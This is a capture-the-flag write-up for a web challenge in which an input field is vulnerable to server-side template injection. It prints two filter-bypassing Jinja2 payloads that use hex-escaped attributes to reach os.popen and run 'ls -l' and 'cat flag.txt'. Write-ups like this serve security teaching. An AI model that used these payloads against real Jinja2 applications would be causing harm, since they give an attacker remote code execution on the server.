Web - Antikythera

Description

Lost in the labyrinthine calculations of planetary motion, I stumbled upon an anomaly. Ancient Greek symbols, not our modern equations, whispered of celestial mechanics. Driven by a scientist's curiosity, I cracked their cryptic code. The unearthed knowledge, a testament to their forgotten ingenuity, fueled the creation of the "Greek Astronomical Calculator." This isn't just a tool for prediction; it's a portal to a bygone era's uncanny understanding of the cosmos.

Solution

Unfortunately, I don't have any images to show because the challenge is not up anymore. But basically, the challenge has an input field that is vulnerable to SSTI. This is confirmed by trying the typical SSTI input {{7*7}} and checking that the server evaluates the input to 49.

Looking at HackTricks and trying out a few other payloads, the server appears to be running Jinja2 (Python).

Thankfully, HackTricks have a page dedicated to Jinja2 SSTI including payloads that bypasses typical filters.

HackTricks

If we scroll down the page, we find a payload that seems to avoid most filters here.

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}

The payload above is an RCE payload that executes the ls -l command. Running it, the flag.txt file can be found in the directory.

Finally, we run the cat flag.txt payload to read the flag:

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat${IFS}flag.txt')|attr('read')()%}{%print(a)%}{%endwith%}

Last updated